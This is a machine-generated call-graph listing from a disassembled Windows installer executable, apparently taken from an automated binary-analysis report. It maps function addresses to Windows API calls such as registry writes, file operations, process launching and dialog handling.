404266 SendMessageW 4659->4699 4663 404298 8 API calls 4660->4663 4666 4056a1 ShowWindow 4661->4666 4667 40567b 4661->4667 4662->4660 4673 4056d5 SendMessageW 4662->4673 4668 40569a 4663->4668 4671 405567 4664->4671 4672 40554b SendMessageW SendMessageW 4664->4672 4669 4056c1 4666->4669 4670 4056b3 4666->4670 4674 40420a SendMessageW 4667->4674 4676 40420a SendMessageW 4669->4676 4675 405322 24 API calls 4670->4675 4677 40557a 4671->4677 4678 40556c SendMessageW 4671->4678 4672->4671 4673->4668 4679 4056ee CreatePopupMenu 4673->4679 4674->4660 4675->4669 4676->4662 4681 404231 18 API calls 4677->4681 4678->4677 4680 4062dc 17 API calls 4679->4680 4682 4056fe AppendMenuW 4680->4682 4683 40558a 4681->4683 4684 40571b GetWindowRect 4682->4684 4685 40572e TrackPopupMenu 4682->4685 4686 405593 ShowWindow 4683->4686 4687 4055c7 GetDlgItem SendMessageW 4683->4687 4684->4685 4685->4668 4688 405749 4685->4688 4689 4055b6 4686->4689 4690 4055a9 ShowWindow 4686->4690 4687->4668 4691 4055ee SendMessageW SendMessageW 4687->4691 4692 405765 SendMessageW 4688->4692 4698 404266 SendMessageW 4689->4698 4690->4689 4691->4668 4692->4692 4693 405782 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4692->4693 4695 4057a7 SendMessageW 4693->4695 4695->4695 4696 4057d0 GlobalUnlock SetClipboardData CloseClipboard 4695->4696 4696->4668 4697->4658 4698->4687 4699->4656 5113 6e4210e1 5122 6e421111 5113->5122 5114 6e4211d8 GlobalFree 5115 6e4212ba 2 API calls 5115->5122 5116 6e4211d3 5116->5114 5117 6e421272 2 API calls 5120 6e4211c4 GlobalFree 5117->5120 5118 6e421164 GlobalAlloc 5118->5122 5119 6e4211f8 GlobalFree 5119->5122 5120->5122 5121 6e4212e1 lstrcpyW 5121->5122 5122->5114 5122->5115 5122->5116 5122->5117 5122->5118 5122->5119 5122->5120 5122->5121 5123 401563 5124 402a6b 5123->5124 5127 406201 wsprintfW 5124->5127 5126 402a70 5127->5126 4705 4023e4 4706 402c41 17 API calls 4705->4706 4707 4023f6 4706->4707 4708 402c41 17 API calls 4707->4708 4709 402400 4708->4709 4722 402cd1 4709->4722 4712 40288b 4713 402438 4714 402444 4713->4714 4716 402c1f 17 API calls 4713->4716 4717 402463 RegSetValueExW 4714->4717 4719 403116 31 API calls 4714->4719 4715 402c41 17 API calls 4718 40242e lstrlenW 4715->4718 4716->4714 4720 402479 RegCloseKey 4717->4720 4718->4713 4719->4717 4720->4712 4723 402cec 4722->4723 4726 406155 4723->4726 4727 406164 4726->4727 4728 402410 4727->4728 4729 40616f RegCreateKeyExW 4727->4729 4728->4712 4728->4713 4728->4715 4729->4728 4730 4058e6 ShellExecuteExW 5128 404367 lstrcpynW lstrlenW 4731 402868 4732 402c41 17 API calls 4731->4732 4733 40286f FindFirstFileW 4732->4733 4734 402897 4733->4734 4737 402882 4733->4737 4739 406201 wsprintfW 4734->4739 4736 4028a0 4740 4062ba lstrcpynW 4736->4740 4739->4736 4740->4737 5129 401968 5130 402c1f 17 API calls 5129->5130 5131 40196f 5130->5131 5132 402c1f 17 API calls 5131->5132 5133 40197c 5132->5133 5134 402c41 17 API calls 5133->5134 5135 401993 lstrlenW 5134->5135 5137 4019a4 5135->5137 5136 4019e5 5137->5136 5141 4062ba lstrcpynW 5137->5141 5139 4019d5 5139->5136 5140 4019da lstrlenW 5139->5140 5140->5136 5141->5139 5142 403968 5143 403973 5142->5143 5144 403977 5143->5144 5145 40397a GlobalAlloc 5143->5145 5145->5144 5146 40166a 5147 402c41 17 API calls 5146->5147 5148 401670 5147->5148 5149 4065fd 2 API calls 5148->5149 5150 401676 5149->5150 4741 4027ef 4742 402a70 4741->4742 4743 4027f6 4741->4743 4744 402c1f 17 API calls 4743->4744 4745 4027fd 4744->4745 4746 40280c SetFilePointer 4745->4746 4746->4742 4747 40281c 4746->4747 4749 406201 wsprintfW 4747->4749 4749->4742 4750 40176f 4751 402c41 17 API calls 4750->4751 4752 401776 4751->4752 4753 401796 4752->4753 4754 40179e 4752->4754 4790 4062ba lstrcpynW 4753->4790 4791 4062ba lstrcpynW 4754->4791 4757 40179c 4761 40654e 5 API calls 4757->4761 4758 4017a9 4759 405b8f 3 API calls 4758->4759 4760 4017af lstrcatW 4759->4760 4760->4757 4769 4017bb 4761->4769 4762 4065fd 2 API calls 4762->4769 4763 4017f7 4764 405d8b 2 API calls 4763->4764 4764->4769 4766 4017cd CompareFileTime 4766->4769 4767 40188d 4768 405322 24 API calls 4767->4768 4770 401897 4768->4770 4769->4762 4769->4763 4769->4766 4769->4767 4772 4062ba lstrcpynW 4769->4772 4777 4062dc 17 API calls 4769->4777 4784 405920 MessageBoxIndirectW 4769->4784 4787 401864 4769->4787 4789 405db0 GetFileAttributesW CreateFileW 4769->4789 4773 403116 31 API calls 4770->4773 4771 405322 24 API calls 4774 401879 4771->4774 4772->4769 4775 4018aa 4773->4775 4776 4018be SetFileTime 4775->4776 4778 4018d0 CloseHandle 4775->4778 4776->4778 4777->4769 4778->4774 4779 4018e1 4778->4779 4780 4018e6 4779->4780 4781 4018f9 4779->4781 4782 4062dc 17 API calls 4780->4782 4783 4062dc 17 API calls 4781->4783 4785 4018ee lstrcatW 4782->4785 4786 401901 4783->4786 4784->4769 4785->4786 4788 405920 MessageBoxIndirectW 4786->4788 4787->4771 4787->4774 4788->4774 4789->4769 4790->4757 4791->4758 5151 6e42166d 5152 6e421516 GlobalFree 5151->5152 5154 6e421685 5152->5154 5153 6e4216cb GlobalFree 5154->5153 5155 6e4216a0 5154->5155 5156 6e4216b7 VirtualFree 5154->5156 5155->5153 5156->5153 5157 4043f0 5158 404408 5157->5158 5162 404522 5157->5162 5163 404231 18 API calls 5158->5163 5159 40458c 5160 404656 5159->5160 5161 404596 GetDlgItem 5159->5161 5168 404298 8 API calls 5160->5168 5164 4045b0 5161->5164 5165 404617 5161->5165 5162->5159 5162->5160 5166 40455d GetDlgItem SendMessageW 5162->5166 5167 40446f 5163->5167 5164->5165 5172 4045d6 SendMessageW LoadCursorW SetCursor 5164->5172 5165->5160 5169 404629 5165->5169 5190 404253 KiUserCallbackDispatcher 5166->5190 5171 404231 18 API calls 5167->5171 5178 404651 5168->5178 5173 40463f 5169->5173 5174 40462f SendMessageW 5169->5174 5176 40447c CheckDlgButton 5171->5176 5194 40469f 5172->5194 5173->5178 5179 404645 SendMessageW 5173->5179 5174->5173 5175 404587 5191 40467b 5175->5191 5188 404253 KiUserCallbackDispatcher 5176->5188 5179->5178 5183 40449a GetDlgItem 5189 404266 SendMessageW 5183->5189 5185 4044b0 SendMessageW 5186 4044d6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5185->5186 5187 4044cd GetSysColor 5185->5187 5186->5178 5187->5186 5188->5183 5189->5185 5190->5175 5192 404689 5191->5192 5193 40468e SendMessageW 5191->5193 5192->5193 5193->5159 5197 4058e6 ShellExecuteExW 5194->5197 5196 404605 LoadCursorW SetCursor 5196->5165 5197->5196 5198 401a72 5199 402c1f 17 API calls 5198->5199 5200 401a7b 5199->5200 5201 402c1f 17 API calls 5200->5201 5202 401a20 5201->5202 4983 401573 4984 401583 ShowWindow 4983->4984 4985 40158c 4983->4985 4984->4985 4986 40159a ShowWindow 4985->4986 4987 402ac5 4985->4987 4986->4987 5203 401cf3 5204 402c1f 17 API calls 5203->5204 5205 401cf9 IsWindow 5204->5205 5206 401a20 5205->5206 5207 402df3 5208 402e05 SetTimer 5207->5208 5209 402e1e 5207->5209 5208->5209 5210 402e73 5209->5210 5211 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5209->5211 5211->5210 5212 4014f5 SetForegroundWindow 5213 402ac5 5212->5213 5214 402576 5215 402c41 17 API calls 5214->5215 5216 40257d 5215->5216 5219 405db0 GetFileAttributesW CreateFileW 5216->5219 5218 402589 5219->5218 5220 401b77 5221 401b84 5220->5221 5222 401bc8 5220->5222 5225 401c0d 5221->5225 5230 401b9b 5221->5230 5223 401bf2 GlobalAlloc 5222->5223 5224 401bcd 5222->5224 5227 4062dc 17 API calls 5223->5227 5233 4022f7 5224->5233 5241 4062ba lstrcpynW 5224->5241 5226 4062dc 17 API calls 5225->5226 5225->5233 5229 4022f1 5226->5229 5227->5225 5234 405920 MessageBoxIndirectW 5229->5234 5239 4062ba lstrcpynW 5230->5239 5231 401bdf GlobalFree 5231->5233 5234->5233 5235 401baa 5240 4062ba lstrcpynW 5235->5240 5237 401bb9 5242 4062ba lstrcpynW 5237->5242 5239->5235 5240->5237 5241->5231 5242->5233 4995 4024f8 4996 402c81 17 API calls 4995->4996 4997 402502 4996->4997 4998 402c1f 17 API calls 4997->4998 4999 40250b 4998->4999 5000 40251a 4999->5000 5005 40288b 4999->5005 5001 402533 RegEnumValueW 5000->5001 5002 402527 RegEnumKeyW 5000->5002 5003 402548 5001->5003 5004 40254f RegCloseKey 5001->5004 5002->5004 5003->5004 5004->5005 5243 404a78 5244 404aa4 5243->5244 5245 404a88 5243->5245 5246 404ad7 5244->5246 5247 404aaa SHGetPathFromIDListW 5244->5247 5254 405904 GetDlgItemTextW 5245->5254 5250 404aba 5247->5250 5253 404ac1 SendMessageW 5247->5253 5249 404a95 SendMessageW 5249->5244 5251 40140b 2 API calls 5250->5251 5251->5253 5253->5246 5254->5249 5255 40167b 5256 402c41 17 API calls 5255->5256 5257 401682 5256->5257 5258 402c41 17 API calls 5257->5258 5259 40168b 5258->5259 5260 402c41 17 API calls 5259->5260 5261 401694 MoveFileW 5260->5261 5262 4016a0 5261->5262 5263 4016a7 5261->5263 5265 401423 24 API calls 5262->5265 5264 4065fd 2 API calls 5263->5264 5267 402250 5263->5267 5266 4016b6 5264->5266 5265->5267 5266->5267 5268 406080 36 API calls 5266->5268 5268->5262 5269 401e7d 5270 402c41 17 API calls 5269->5270 5271 401e83 5270->5271 5272 402c41 17 API calls 5271->5272 5273 401e8c 5272->5273 5274 402c41 17 API calls 5273->5274 5275 401e95 5274->5275 5276 402c41 17 API calls 5275->5276 5277 401e9e 5276->5277 5278 401423 24 API calls 5277->5278 5279 401ea5 5278->5279 5286 4058e6 ShellExecuteExW 5279->5286 5281 401ee7 5282 406745 5 API calls 5281->5282 5283 40288b 5281->5283 5284 401f01 CloseHandle 5282->5284 5284->5283 5286->5281 5287 6e4222fd 5288 6e422367 5287->5288 5289 6e422372 GlobalAlloc 5288->5289 5290 6e422391 5288->5290 5289->5288 5291 4019ff 5292 402c41 17 API calls 5291->5292 5293 401a06 5292->5293 5294 402c41 17 API calls 5293->5294 5295 401a0f 5294->5295 5296 401a16 lstrcmpiW 5295->5296 5297 401a28 lstrcmpW 5295->5297 5298 401a1c 5296->5298 5297->5298 5299 401000 5300 401037 BeginPaint GetClientRect 5299->5300 5301 40100c DefWindowProcW 5299->5301 5303 4010f3 5300->5303 5304 401179 5301->5304 5305 401073 CreateBrushIndirect FillRect DeleteObject 5303->5305 5306 4010fc 5303->5306 5305->5303 5307 401102 CreateFontIndirectW 5306->5307 5308 401167 EndPaint 5306->5308 5307->5308 5309 401112 6 API calls 5307->5309 5308->5304 5309->5308 5310 6e421000 5313 6e42101b 5310->5313 5314 6e421516 GlobalFree 5313->5314 5315 6e421020 5314->5315 5316 6e421027 GlobalAlloc 5315->5316 5317 6e421024 5315->5317 5316->5317 5318 6e42153d 3 API calls 5317->5318 5319 6e421019 5318->5319 5320 401503 5321 40150b 5320->5321 5323 40151e 5320->5323 5322 402c1f 17 API calls 5321->5322 5322->5323 4088 402104 4089 402c41 17 API calls 4088->4089 4090 40210b 4089->4090 4091 402c41 17 API calls 4090->4091 4092 402115 4091->4092 4093 402c41 17 API calls 4092->4093 4094 40211f 4093->4094 4095 402c41 17 API calls 4094->4095 4096 402129 4095->4096 4097 402c41 17 API calls 4096->4097 4099 402133 4097->4099 4098 402172 CoCreateInstance 4103 402191 4098->4103 4099->4098 4100 402c41 17 API calls 4099->4100 4100->4098 4101 401423 24 API calls 4102 402250 4101->4102 4103->4101 4103->4102 4104 402484 4115 402c81 4104->4115 4107 402c41 17 API calls 4108 402497 4107->4108 4109 4024a2 RegQueryValueExW 4108->4109 4113 40288b 4108->4113 4110 4024c8 RegCloseKey 4109->4110 4111 4024c2 4109->4111 4110->4113 4111->4110 4120 406201 wsprintfW 4111->4120 4116 402c41 17 API calls 4115->4116 4117 402c98 4116->4117 4118 406127 RegOpenKeyExW 4117->4118 4119 40248e 4118->4119 4119->4107 4120->4110 4121 401f06 4122 402c41 17 API calls 4121->4122 4123 401f0c 4122->4123 4124 405322 24 API calls 4123->4124 4125 401f16 4124->4125 4136 4058a3 CreateProcessW 4125->4136 4128 401f3f CloseHandle 4132 40288b 4128->4132 4131 401f31 4133 401f41 4131->4133 4134 401f36 4131->4134 4133->4128 4144 406201 wsprintfW 4134->4144 4137 401f1c 4136->4137 4138 4058d6 CloseHandle 4136->4138 4137->4128 4137->4132 4139 406745 WaitForSingleObject 4137->4139 4138->4137 4140 40675f 4139->4140 4141 406771 GetExitCodeProcess 4140->4141 4145 4066d0 4140->4145 4141->4131 4144->4128 4146 4066ed PeekMessageW 4145->4146 4147 4066e3 DispatchMessageW 4146->4147 4148 4066fd WaitForSingleObject 4146->4148 4147->4146 4148->4140 4184 40230c 4185 402314 4184->4185 4186 40231a 4184->4186 4187 402c41 17 API calls 4185->4187 4188 402c41 17 API calls 4186->4188 4189 402328 4186->4189 4187->4186 4188->4189 4190 402c41 17 API calls 4189->4190 4192 402336 4189->4192 4190->4192 4191 402c41 17 API calls 4193 40233f WritePrivateProfileStringW 4191->4193 4192->4191 5324 40190c 5325 401943 5324->5325 5326 402c41 17 API calls 5325->5326 5327 401948 5326->5327 5328 4059cc 67 API calls 5327->5328 5329 401951 5328->5329 5330 401f8c 5331 402c41 17 API calls 5330->5331 5332 401f93 5331->5332 5333 406694 5 API calls 5332->5333 5334 401fa2 5333->5334 5335 401fbe GlobalAlloc 5334->5335 5338 402026 5334->5338 5336 401fd2 5335->5336 5335->5338 5337 406694 5 API calls 5336->5337 5339 401fd9 5337->5339 5340 406694 5 API calls 5339->5340 5341 401fe3 5340->5341 5341->5338 5345 406201 wsprintfW 5341->5345 5343 402018 5346 406201 wsprintfW 5343->5346 5345->5343 5346->5338 4201 40238e 4202 4023c1 4201->4202 4203 402396 4201->4203 4205 402c41 17 API calls 4202->4205 4204 402c81 17 API calls 4203->4204 4206 40239d 4204->4206 4207 4023c8 4205->4207 4209 4023a7 4206->4209 4210 4023d5 4206->4210 4213 402cff 4207->4213 4211 402c41 17 API calls 4209->4211 4212 4023ae RegDeleteValueW RegCloseKey 4211->4212 4212->4210 4214 402d0c 4213->4214 4215 402d13 4213->4215 4214->4210 4215->4214 4217 402d44 4215->4217 4218 406127 RegOpenKeyExW 4217->4218 4219 402d72 4218->4219 4220 402dec 4219->4220 4224 402d76 4219->4224 4220->4214 4221 402d98 RegEnumKeyW 4222 402daf RegCloseKey 4221->4222 4221->4224 4225 406694 5 API calls 4222->4225 4223 402dd0 RegCloseKey 4223->4220 4224->4221 4224->4222 4224->4223 4226 402d44 6 API calls 4224->4226 4227 402dbf 4225->4227 4226->4224 4228 402de0 RegDeleteKeyW 4227->4228 4229 402dc3 4227->4229 4228->4220 4229->4220 4230 40338f SetErrorMode GetVersion 4231 4033ce 4230->4231 4232 4033d4 4230->4232 4233 406694 5 API calls 4231->4233 4234 406624 3 API calls 4232->4234 4233->4232 4235 4033ea lstrlenA 4234->4235 4235->4232 4236 4033fa 4235->4236 4237 406694 5 API calls 4236->4237 4238 403401 4237->4238 4239 406694 5 API calls 4238->4239 4240 403408 4239->4240 4241 406694 5 API calls 4240->4241 4242 403414 #17 OleInitialize SHGetFileInfoW 4241->4242 4320 4062ba lstrcpynW 4242->4320 4245 403460 GetCommandLineW 4321 4062ba lstrcpynW 4245->4321 4247 403472 4248 405bbc CharNextW 4247->4248 4249 403497 CharNextW 4248->4249 4250 4035c1 GetTempPathW 4249->4250 4261 4034b0 4249->4261 4322 40335e 4250->4322 4252 4035d9 4253 403633 DeleteFileW 4252->4253 4254 4035dd GetWindowsDirectoryW lstrcatW 4252->4254 4332 402edd GetTickCount GetModuleFileNameW 4253->4332 4257 40335e 12 API calls 4254->4257 4255 405bbc CharNextW 4255->4261 4258 4035f9 4257->4258 4258->4253 4260 4035fd GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4258->4260 4259 403647 4265 4036ea 4259->4265 4269 405bbc CharNextW 4259->4269 4316 4036fa 4259->4316 4262 40335e 12 API calls 4260->4262 4261->4255 4263 4035ac 4261->4263 4264 4035aa 4261->4264 4267 40362b 4262->4267 4416 4062ba lstrcpynW 4263->4416 4264->4250 4360 4039aa 4265->4360 4267->4253 4267->4316 4286 403666 4269->4286 4272 403834 4275 4038b8 ExitProcess 4272->4275 4276 40383c GetCurrentProcess OpenProcessToken 4272->4276 4273 403714 4426 405920 4273->4426 4281 403854 LookupPrivilegeValueW AdjustTokenPrivileges 4276->4281 4282 403888 4276->4282 4279 4036c4 4283 405c97 18 API calls 4279->4283 4280 40372a 4284 40588b 5 API calls 4280->4284 4281->4282 4285 406694 5 API calls 4282->4285 4287 4036d0 4283->4287 4288 40372f lstrcatW 4284->4288 4289 40388f 4285->4289 4286->4279 4286->4280 4287->4316 4417 4062ba lstrcpynW 4287->4417 4290 403740 lstrcatW 4288->4290 4291 40374b lstrcatW lstrcmpiW 4288->4291 4292 4038a4 ExitWindowsEx 4289->4292 4295 4038b1 4289->4295 4290->4291 4294 403767 4291->4294 4291->4316 4292->4275 4292->4295 4297 403773 4294->4297 4298 40376c 4294->4298 4432 40140b 4295->4432 4296 4036df 4418 4062ba lstrcpynW 4296->4418 4302 40586e 2 API calls 4297->4302 4301 4057f1 4 API calls 4298->4301 4303 403771 4301->4303 4304 403778 SetCurrentDirectoryW 4302->4304 4303->4304 4305 403793 4304->4305 4306 403788 4304->4306 4431 4062ba lstrcpynW 4305->4431 4430 4062ba lstrcpynW 4306->4430 4309 4037a1 4310 4062dc 17 API calls 4309->4310 4313 403828 4309->4313 4315 406080 36 API calls 4309->4315 4317 4062dc 17 API calls 4309->4317 4318 4058a3 2 API calls 4309->4318 4319 403813 CloseHandle 4309->4319 4311 4037d2 DeleteFileW 4310->4311 4311->4309 4312 4037df CopyFileW 4311->4312 4312->4309 4314 406080 36 API calls 4313->4314 4314->4316 4315->4309 4419 4038d0 4316->4419 4317->4309 4318->4309 4319->4309 4320->4245 4321->4247 4323 40654e 5 API calls 4322->4323 4325 40336a 4323->4325 4324 403374 4324->4252 4325->4324 4326 405b8f 3 API calls 4325->4326 4327 40337c 4326->4327 4328 40586e 2 API calls 4327->4328 4329 403382 4328->4329 4435 405ddf 4329->4435 4439 405db0 GetFileAttributesW CreateFileW 4332->4439 4334 402f1d 4353 402f2d 4334->4353 4440 4062ba lstrcpynW 4334->4440 4336 402f43 4337 405bdb 2 API calls 4336->4337 4338 402f49 4337->4338 4441 4062ba lstrcpynW 4338->4441 4340 402f54 GetFileSize 4341 403050 4340->4341 4359 402f6b 4340->4359 4442 402e79 4341->4442 4343 403059 4345 403089 GlobalAlloc 4343->4345 4343->4353 4477 403347 SetFilePointer 4343->4477 4453 403347 SetFilePointer 4345->4453 4346 4030bc 4350 402e79 6 API calls 4346->4350 4349 4030a4 4454 403116 4349->4454 4350->4353 4351 403072 4354 403331 ReadFile 4351->4354 4353->4259 4356 40307d 4354->4356 4355 402e79 6 API calls 4355->4359 4356->4345 4356->4353 4357 4030b0 4357->4353 4357->4357 4358 4030ed SetFilePointer 4357->4358 4358->4353 4359->4341 4359->4346 4359->4353 4359->4355 4474 403331 4359->4474 4361 406694 5 API calls 4360->4361 4362 4039be 4361->4362 4363 4039c4 4362->4363 4364 4039d6 4362->4364 4494 406201 wsprintfW 4363->4494 4365 406188 3 API calls 4364->4365 4366 403a06 4365->4366 4368 403a25 lstrcatW 4366->4368 4370 406188 3 API calls 4366->4370 4369 4039d4 4368->4369 4479 403c80 4369->4479 4370->4368 4373 405c97 18 API calls 4374 403a57 4373->4374 4375 403aeb 4374->4375 4377 406188 3 API calls 4374->4377 4376 405c97 18 API calls 4375->4376 4378 403af1 4376->4378 4379 403a89 4377->4379 4380 403b01 LoadImageW 4378->4380 4381 4062dc 17 API calls 4378->4381 4379->4375 4384 403aaa lstrlenW 4379->4384 4387 405bbc CharNextW 4379->4387 4382 403ba7 4380->4382 4383 403b28 RegisterClassW 4380->4383 4381->4380 4386 40140b 2 API calls 4382->4386 4385 403b5e SystemParametersInfoW CreateWindowExW 4383->4385 4415 403bb1 4383->4415 4388 403ab8 lstrcmpiW 4384->4388 4389 403ade 4384->4389 4385->4382 4390 403bad 4386->4390 4392 403aa7 4387->4392 4388->4389 4393 403ac8 GetFileAttributesW 4388->4393 4391 405b8f 3 API calls 4389->4391 4394 403c80 18 API calls 4390->4394 4390->4415 4395 403ae4 4391->4395 4392->4384 4396 403ad4 4393->4396 4397 403bbe 4394->4397 4495 4062ba lstrcpynW 4395->4495 4396->4389 4399 405bdb 2 API calls 4396->4399 4400 403bca ShowWindow 4397->4400 4401 403c4d 4397->4401 4399->4389 4403 406624 3 API calls 4400->4403 4487 4053f5 OleInitialize 4401->4487 4405 403be2 4403->4405 4404 403c53 4406 403c57 4404->4406 4407 403c6f 4404->4407 4408 403bf0 GetClassInfoW 4405->4408 4410 406624 3 API calls 4405->4410 4413 40140b 2 API calls 4406->4413 4406->4415 4409 40140b 2 API calls 4407->4409 4411 403c04 GetClassInfoW RegisterClassW 4408->4411 4412 403c1a DialogBoxParamW 4408->4412 4409->4415 4410->4408 4411->4412 4414 40140b 2 API calls 4412->4414 4413->4415 4414->4415 4415->4316 4416->4264 4417->4296 4418->4265 4420 4038e8 4419->4420 4421 4038da CloseHandle 4419->4421 4507 403915 4420->4507 4421->4420 4424 4059cc 67 API calls 4425 403703 OleUninitialize 4424->4425 4425->4272 4425->4273 4427 405935 4426->4427 4428 405949 MessageBoxIndirectW 4427->4428 4429 403722 ExitProcess 4427->4429 4428->4429 4430->4305 4431->4309 4433 401389 2 API calls 4432->4433 4434 401420 4433->4434 4434->4275 4436 405dec GetTickCount GetTempFileNameW 4435->4436 4437 405e22 4436->4437 4438 40338d 4436->4438 4437->4436 4437->4438 4438->4252 4439->4334 4440->4336 4441->4340 4443 402e82 4442->4443 4444 402e9a 4442->4444 4445 402e92 4443->4445 4446 402e8b DestroyWindow 4443->4446 4447 402ea2 4444->4447 4448 402eaa GetTickCount 4444->4448 4445->4343 4446->4445 4449 4066d0 2 API calls 4447->4449 4450 402eb8 CreateDialogParamW ShowWindow 4448->4450 4451 402edb 4448->4451 4452 402ea8 4449->4452 4450->4451 4451->4343 4452->4343 4453->4349 4455 40312f 4454->4455 4456 40315d 4455->4456 4478 403347 SetFilePointer 4455->4478 4458 403331 ReadFile 4456->4458 4459 403168 4458->4459 4460 4032b4 4459->4460 4461 4032ca 4459->4461 4462 40317a GetTickCount 4459->4462 4460->4357 4463 40330c 4461->4463 4466 4032ce 4461->4466 4462->4460 4468 4031c9 4462->4468 4464 403331 ReadFile 4463->4464 4464->4460 4465 403331 ReadFile 4465->4468 4466->4460 4467 403331 ReadFile 4466->4467 4469 405e62 WriteFile 4466->4469 4467->4466 4468->4460 4468->4465 4470 40321f GetTickCount 4468->4470 4471 403244 MulDiv wsprintfW 4468->4471 4473 405e62 WriteFile 4468->4473 4469->4466 4470->4468 4472 405322 24 API calls 4471->4472 4472->4468 4473->4468 4475 405e33 ReadFile 4474->4475 4476 403344 4475->4476 4476->4359 4477->4351 4478->4456 4480 403c94 4479->4480 4496 406201 wsprintfW 4480->4496 4482 403d05 4497 403d39 4482->4497 4484 403a35 4484->4373 4485 403d0a 4485->4484 4486 4062dc 17 API calls 4485->4486 4486->4485 4500 40427d 4487->4500 4489 40543f 4490 40427d SendMessageW 4489->4490 4491 405451 OleUninitialize 4490->4491 4491->4404 4493 405418 4493->4489 4503 401389 4493->4503 4494->4369 4495->4375 4496->4482 4498 4062dc 17 API calls 4497->4498 4499 403d47 SetWindowTextW 4498->4499 4499->4485 4501 404295 4500->4501 4502 404286 SendMessageW 4500->4502 4501->4493 4502->4501 4505 401390 4503->4505 4504 4013fe 4504->4493 4505->4504 4506 4013cb MulDiv SendMessageW 4505->4506 4506->4505 4508 403923 4507->4508 4509 403928 FreeLibrary GlobalFree 4508->4509 4510 4038ed 4508->4510 4509->4509 4509->4510 4510->4424 5347 40190f 5348 402c41 17 API calls 5347->5348 5349 401916 5348->5349 5350 405920 MessageBoxIndirectW 5349->5350 5351 40191f 5350->5351 4511 6e422993 4512 6e4229e3 4511->4512 4513 6e4229a3 VirtualProtect 4511->4513 4513->4512 5352 401491 5353 405322 24 API calls 5352->5353 5354 401498 5353->5354 5355 401d14 5356 402c1f 17 API calls 5355->5356 5357 401d1b 5356->5357 5358 402c1f 17 API calls 5357->5358 5359 401d27 GetDlgItem 5358->5359 5360 402592 5359->5360 5361 405296 5362 4052a6 5361->5362 5363 4052ba 5361->5363 5365 405303 5362->5365 5366 4052ac 5362->5366 5364 4052c2 IsWindowVisible 5363->5364 5372 4052d9 5363->5372 5364->5365 5367 4052cf 5364->5367 5368 405308 CallWindowProcW 5365->5368 5369 40427d SendMessageW 5366->5369 5374 404bec SendMessageW 5367->5374 5371 4052b6 5368->5371 5369->5371 5372->5368 5379 404c6c 5372->5379 5375 404c4b SendMessageW 5374->5375 5376 404c0f GetMessagePos ScreenToClient SendMessageW 5374->5376 5377 404c43 5375->5377 5376->5377 5378 404c48 5376->5378 5377->5372 5378->5375 5388 4062ba lstrcpynW 5379->5388 5381 404c7f 5389 406201 wsprintfW 5381->5389 5383 404c89 5384 40140b 2 API calls 5383->5384 5385 404c92 5384->5385 5390 4062ba lstrcpynW 5385->5390 5387 404c99 5387->5365 5388->5381 5389->5383 5390->5387 5391 402598 5392 4025c7 5391->5392 5393 4025ac 5391->5393 5395 4025fb 5392->5395 5396 4025cc 5392->5396 5394 402c1f 17 API calls 5393->5394 5403 4025b3 5394->5403 5398 402c41 17 API calls 5395->5398 5397 402c41 17 API calls 5396->5397 5399 4025d3 WideCharToMultiByte lstrlenA 5397->5399 5400 402602 lstrlenW 5398->5400 5399->5403 5400->5403 5401 402645 5402 405e62 WriteFile 5402->5401 5403->5401 5404 405e91 5 API calls 5403->5404 5405 40262f 5403->5405 5404->5405 5405->5401 5405->5402 5406 404c9e GetDlgItem GetDlgItem 5407 404cf0 7 API calls 5406->5407 5410 404f09 5406->5410 5408 404d93 DeleteObject 5407->5408 5409 404d86 SendMessageW 5407->5409 5411 404d9c 5408->5411 5409->5408 5425 404bec 5 API calls 5410->5425 5429 404fed 5410->5429 5438 404f7a 5410->5438 5412 404dd3 5411->5412 5414 4062dc 17 API calls 5411->5414 5415 404231 18 API calls 5412->5415 5413 405099 5418 4050a3 SendMessageW 5413->5418 5419 4050ab 5413->5419 5420 404db5 SendMessageW SendMessageW 5414->5420 5416 404de7 5415->5416 5421 404231 18 API calls 5416->5421 5417 404efc 5423 404298 8 API calls 5417->5423 5418->5419 5430 4050c4 5419->5430 5431 4050bd ImageList_Destroy 5419->5431 5435 4050d4 5419->5435 5420->5411 5439 404df5 5421->5439 5422 405046 SendMessageW 5422->5417 5427 40505b SendMessageW 5422->5427 5428 40528f 5423->5428 5424 404fdf SendMessageW 5424->5429 5425->5438 5426 405243 5426->5417 5436 405255 ShowWindow GetDlgItem ShowWindow 5426->5436 5434 40506e 5427->5434 5429->5413 5429->5417 5429->5422 5432 4050cd GlobalFree 5430->5432 5430->5435 5431->5430 5432->5435 5433 404eca GetWindowLongW SetWindowLongW 5437 404ee3 5433->5437 5444 40507f SendMessageW 5434->5444 5435->5426 5449 404c6c 4 API calls 5435->5449 5453 40510f 5435->5453 5436->5417 5440 404f01 5437->5440 5441 404ee9 ShowWindow 5437->5441 5438->5424 5438->5429 5439->5433 5443 404e45 SendMessageW 5439->5443 5445 404ec4 5439->5445 5447 404e81 SendMessageW 5439->5447 5448 404e92 SendMessageW 5439->5448 5458 404266 SendMessageW 5440->5458 5457 404266 SendMessageW 5441->5457 5443->5439 5444->5413 5445->5433 5445->5437 5447->5439 5448->5439 5449->5453 5450 405219 InvalidateRect 5450->5426 5451 40522f 5450->5451 5459 404ba7 5451->5459 5452 40513d SendMessageW 5456 405153 5452->5456 5453->5452 5453->5456 5455 4051c7 SendMessageW SendMessageW 5455->5456 5456->5450 5456->5455 5457->5417 5458->5410 5462 404ade 5459->5462 5461 404bbc 5461->5426 5463 404af7 5462->5463 5464 4062dc 17 API calls 5463->5464 5465 404b5b 5464->5465 5466 4062dc 17 API calls 5465->5466 5467 404b66 5466->5467 5468 4062dc 17 API calls 5467->5468 5469 404b7c lstrlenW wsprintfW SetDlgItemTextW 5468->5469 5469->5461 5470 40149e 5471 4022f7 5470->5471 5472 4014ac PostQuitMessage 5470->5472 5472->5471 4629 401c1f 4630 402c1f 17 API calls 4629->4630 4631 401c26 4630->4631 4632 402c1f 17 API calls 4631->4632 4633 401c33 4632->4633 4634 401c48 4633->4634 4635 402c41 17 API calls 4633->4635 4636 401c58 4634->4636 4637 402c41 17 API calls 4634->4637 4635->4634 4638 401c63 4636->4638 4639 401caf 4636->4639 4637->4636 4641 402c1f 17 API calls 4638->4641 4640 402c41 17 API calls 4639->4640 4642 401cb4 4640->4642 4643 401c68 4641->4643 4644 402c41 17 API calls 4642->4644 4645 402c1f 17 API calls 4643->4645 4646 401cbd FindWindowExW 4644->4646 4647 401c74 4645->4647 4650 401cdf 4646->4650 4648 401c81 SendMessageTimeoutW 4647->4648 4649 